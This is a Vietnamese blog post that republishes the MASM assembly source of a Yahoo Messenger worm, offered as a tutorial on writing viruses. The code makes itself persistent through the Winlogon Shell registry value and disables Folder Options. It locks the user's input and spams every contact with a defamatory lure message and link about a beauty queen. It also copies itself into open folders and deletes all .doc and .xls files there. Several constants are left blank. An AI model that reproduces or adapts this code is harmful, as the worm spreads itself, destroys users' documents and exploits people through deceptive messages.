Trao đổi với tôi

http://www.buidao.com

6/18/09

[Virus] MASM virus Mai Phuong Thuy

Code Asm Virus Mai Phương Thuý 2006

Author: Toan Thang

Origin Link: http://toanthang.spaces.live.com/blog/cns!A4E5440D42A2F4F4!977.entry

Giới thiệu với các bạn phương thức viết virus bằng ngôn ngữ Assembler.
Chức năng của virus :
- khi lây nhiễm vào máy victim sẽ gởi link chứa Virus tới tất cả các níck trong list Yahoo Chat Messeger.
- Xoá tất cả các file *.doc và *.xls.

Code ASM :

.386
.model flat,stdcall
option casemap:none
include \masm32\include\windows.inc
include \masm32\include\user32.inc
include \masm32\include\kernel32.inc
include \masm32\include\advapi32.inc

includelib \masm32\lib\user32.lib
includelib \masm32\lib\kernel32.lib
includelib \masm32\lib\advapi32.lib

FileTime Struct
dwLowDateTime dd ?
dwHighDateTime dd ?
FileTime Ends

Win32_Find_Data Struct
dwFileAttributes dd ?
ftCreationTime FileTime <>
ftLastAccessTime FileTime <>
ftLastWriteTime FileTime <>
nFileSizeHigh dd ?
nFileSizeLow dd ?
dwReserved0 dd ?
dwReserved1 dd ?
cFileName db 260 dup(?)
cAlternate db 260 dup(?)
Win32_Find_Data Ends

.data
sVirusFileName db 180 dup(0)
sWinDir db 180 dup(0)
sSourceVirus db "\system32\drivers\services.exe",0
HKEY_LOCAL_MACHINE equ 80000002h
sSubKey1 db "Software\Microsoft\Windows NT\CurrentVersion\Winlogon",0
sValueName1 db "Shell",0
sValue1 db "Explorer.exe ",0
sValueFull db 180 dup(0)
sValueType1 equ
sValueType2 equ
SamDesired equ
RegHandle dd 0
sYahooClass db "YahooBuddyMain",0
CmdShow equ
sRetval dd 0
sDwFlags1 equ
sDwFlags2 equ
sVK_Ctrl equ
sVK_Shift equ
sVK_Alt equ
sVK_Down equ
sVK_End equ
sVK_Enter equ 13
sVK_U equ 85
sVK_N equ 78
sVK_M equ 77
sVK_V equ 86
sVirusMsg db "hinh chup len hoa hau Mai Phuong Thuy ... dang thay quan ao trong toilet ... ",13,10
db "khi con la hoc sinh ... http://my.http.vn/hinhvn/miss_thuy.jpg :D",0
wFormat equ
wFlags equ
hGlobalMemory dd 0
lpGlobalMemory dd 0
HKEY_CURRENT_USER equ 80000001h
sSubKey2 db "Software\Microsoft\Internet Explorer\Main",0
sValueName2 db "Window Title",0
sExplorerTitle db ".:: Yeu Giang Son Va Yeu My Nhan ::.",0
sSubKey3 db "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer",0
sValueName3 db "NoFolderOptions",0
sGt dd 1
sSubKey4 db "Software\Microsoft\Windows\CurrentVersion\Explorer\CabinetState",0
sValueName4 db "FullPath",0
Search Win32_Find_Data <>
sExplClass db "CabinetWClass",0
sFileLay db "\Thong Bao.exe",0
sExplTitle db 180 dup(0)
sFindHandle dd 0
sFileHandle dd 0
sLuu1 db 180 dup(0)
sLuu2 db 180 dup(0)
sDocFile db "\*.doc",0
sXlsFile db "\*.xls",0
sThem db "\",0
.code
Main:
;Lấy đường dẫn của Virus đang chạy
 push 180
push offset sVirusFileName
push 00h
call GetModuleFileName

;Copy virus vào Windows\system32\drivers
 push 180
push offset sWinDir
call GetWindowsDirectory

push offset sSourceVirus
push offset sWinDir
call lstrcat

push 1
push offset sWinDir
push offset sVirusFileName
call CopyFile

;Tao Key startup mỗi khi window hoạt động

push offset sValue1
push offset sValueFull
call lstrcat

push offset sWinDir
push offset sValueFull
call lstrcat
push offset RegHandle
push SamDesired
push 00h
push offset sSubKey1
push HKEY_LOCAL_MACHINE
call RegOpenKeyEx

test eax,eax
jnz Exit1

push 180
push offset sValueFull
push sValueType1
push 00h
push offset sValueName1
push RegHandle
call RegSetValueEx

Exit1:
push RegHandle
call RegCloseKey

;đặr tên Title của internet explorer
 push offset RegHandle
push SamDesired
push 00h
push offset sSubKey2
push HKEY_CURRENT_USER
call RegOpenKeyEx

test eax,eax
jnz Exit2

push 38
push offset sExplorerTitle
push sValueType1
push 00h
push offset sValueName2
push RegHandle
call RegSetValueEx

Exit2:
push RegHandle
call RegCloseKey

;Khoá Menu Folder Option cua Explorer
 push offset RegHandle
push SamDesired
push 00h
push offset sSubKey3
push HKEY_CURRENT_USER
call RegOpenKeyEx

test eax,eax
jnz Exit3

push 4d
push offset sGt
push sValueType2
push 00h
push offset sValueName3
push RegHandle
call RegSetValueEx

Exit3:
push RegHandle
call RegCloseKey

;Hiện đường dẫn đầy đủ trên Title của Explorer
push offset RegHandle
push SamDesired
push 00h
push offset sSubKey4
push HKEY_CURRENT_USER
call RegOpenKeyEx

test eax,eax
jnz Exit4

push 4d
push offset sGt
push sValueType2
push 00h
push offset sValueName4
push RegHandle
call RegSetValueEx

Exit4:
push RegHandle
call RegCloseKey

;Tìm xem co chương trinh yahoo chat messager không
;lây lan bằng yahoo chat

_While:
push 00h
push offset sYahooClass
call FindWindow
mov sRetval,eax
cmp eax,0
jz Exit

push 60000
call Sleep
push 1
call BlockInput
push CmdShow
push sRetval
call ShowWindow

push sRetval
call SetForegroundWindow

;Copy Text vao Clipboard
 push offset sVirusMsg
call lstrlen
inc eax
push eax
push wFlags
call GlobalAlloc
mov hGlobalMemory,eax

push eax
call GlobalLock
mov lpGlobalMemory,eax

push offset sVirusMsg
push lpGlobalMemory
call lstrcpy

push hGlobalMemory
call GlobalUnlock

push 00h
call OpenClipboard

call EmptyClipboard

push hGlobalMemory
push wFormat
call SetClipboardData
call CloseClipboard

;lấy tất cả các nick name
 push 00h
push 00h
push 00h
push sVK_Ctrl
call keybd_event

push 00h
push 00h
push 00h
push sVK_M
call keybd_event

push 00h
push sDwFlags1
push 00h
push sVK_M
call keybd_event

push 00h
push sDwFlags1
push 00h
push sVK_Ctrl
call keybd_event

push 00h
push 00h
push 00h
push sVK_Down
call keybd_event

push 00h
push sDwFlags1
push 00h
push sVK_Down
call keybd_event

push 00h
push 00h
push 00h
push sVK_Shift
call keybd_event

push 00h
push sDwFlags2
push 00h
push sVK_End
call keybd_event

push 00h
push sDwFlags1
push 00h
push sVK_End
call keybd_event

push 00h
push sDwFlags1
push 00h
push sVK_Shift
call keybd_event

push 00h
push 00h
push 00h
push sVK_Enter
call keybd_event

push 00h
push sDwFlags1
push 00h
push sVK_Enter
call keybd_event
push 00h
push 00h
push 00h
push sVK_Ctrl
call keybd_event

push 00h
push 00h
push 00h
push sVK_V
call keybd_event

push 00h
push sDwFlags1
push 00h
push sVK_V
call keybd_event

push 00h
push sDwFlags1
push 00h
push sVK_Ctrl
call keybd_event

push 00h
push 00h
push 00h
push sVK_Enter
call keybd_event

push 00h
push sDwFlags1
push 00h
push sVK_Enter
call keybd_event
;Tạo link ở Status của yahoo messager
push 00h
push 00h
push 00h
push sVK_Alt
call keybd_event

push 00h
push 00h
push 00h
push sVK_M
call keybd_event

push 00h
push sDwFlags1
push 00h
push sVK_M
call keybd_event

push 00h
push sDwFlags1
push 00h
push sVK_Alt
call keybd_event

push 00h
push 00h
push 00h
push sVK_U
call keybd_event

push 00h
push sDwFlags1
push 00h
push sVK_U
call keybd_event

push 00h
push 00h
push 00h
push sVK_N
call keybd_event

push 00h
push sDwFlags1
push 00h
push sVK_N
call keybd_event

push 00h
push 00h
push 00h
push sVK_Ctrl
call keybd_event

push 00h
push 00h
push 00h
push sVK_V
call keybd_event

push 00h
push sDwFlags1
push 00h
push sVK_V
call keybd_event

push 00h
push sDwFlags1
push 00h
push sVK_Ctrl
call keybd_event

push 00h
push 00h
push 00h
push sVK_Enter
call keybd_event

push 00h
push sDwFlags1
push 00h
push sVK_Enter
call keybd_event

push 00h
push 00h
push 00h
push sVK_Enter
call keybd_event

push 00h
push sDwFlags1
push 00h
push sVK_Enter
call keybd_event
push 0
call BlockInput

push 180000
call Sleep
Exit:
;Chép file virus vào cac Folder được mở
 push 00h
push offset sExplClass
call FindWindow
mov sFindHandle,eax

push 180
push offset sExplTitle
push sFindHandle
call GetWindowText

push offset sFileLay
push offset sExplTitle
call lstrcat

push 1
push offset sExplTitle
push offset sVirusFileName
call CopyFile

;Xoá các tập tin *.doc or .xls
 push 180
push offset sExplTitle
push sFindHandle
call GetWindowText

push offset sExplTitle
push offset sLuu1
call lstrcpy

push offset sExplTitle
push offset sLuu2
call lstrcpy

push offset sDocFile
push offset sLuu2
call lstrcat

push offset Search
push offset sLuu2
call FindFirstFile
mov dword ptr [sFileHandle],eax

FindNextDoc:
test eax,eax
jz KetThucDoc

push offset sThem
push offset sLuu1
call lstrcat

push offset Search.cFileName
push offset sLuu1
call lstrcat

push offset sLuu1
call DeleteFile

mov sLuu1,00h
push offset sExplTitle
push offset sLuu1
call lstrcat

push offset Search
push dword ptr [sFileHandle]
call FindNextFile
jmp FindNextDoc
KetThucDoc:

;Xoá các Tập tin *.xls
 push offset sExplTitle
push offset sLuu1
call lstrcpy

push offset sExplTitle
push offset sLuu2
call lstrcpy

push offset sXlsFile
push offset sLuu2
call lstrcat

push offset Search
push offset sLuu2
call FindFirstFile
mov dword ptr [sFileHandle],eax

FindNextXls:
test eax,eax
jz KetThucXls

push offset sThem
push offset sLuu1
call lstrcat

push offset Search.cFileName
push offset sLuu1
call lstrcat

push offset sLuu1
call DeleteFile

mov sLuu1,00h
push offset sExplTitle
push offset sLuu1
call lstrcat

push offset Search
push dword ptr [sFileHandle]
call FindNextFile

jmp FindNextXls
KetThucXls:
push 800
call Sleep
jmp _While
push 00h
call ExitProcess
End Main

Mọi ý kiến thắc mắc hãy comment cho tui.

Được đăng bởi Lúc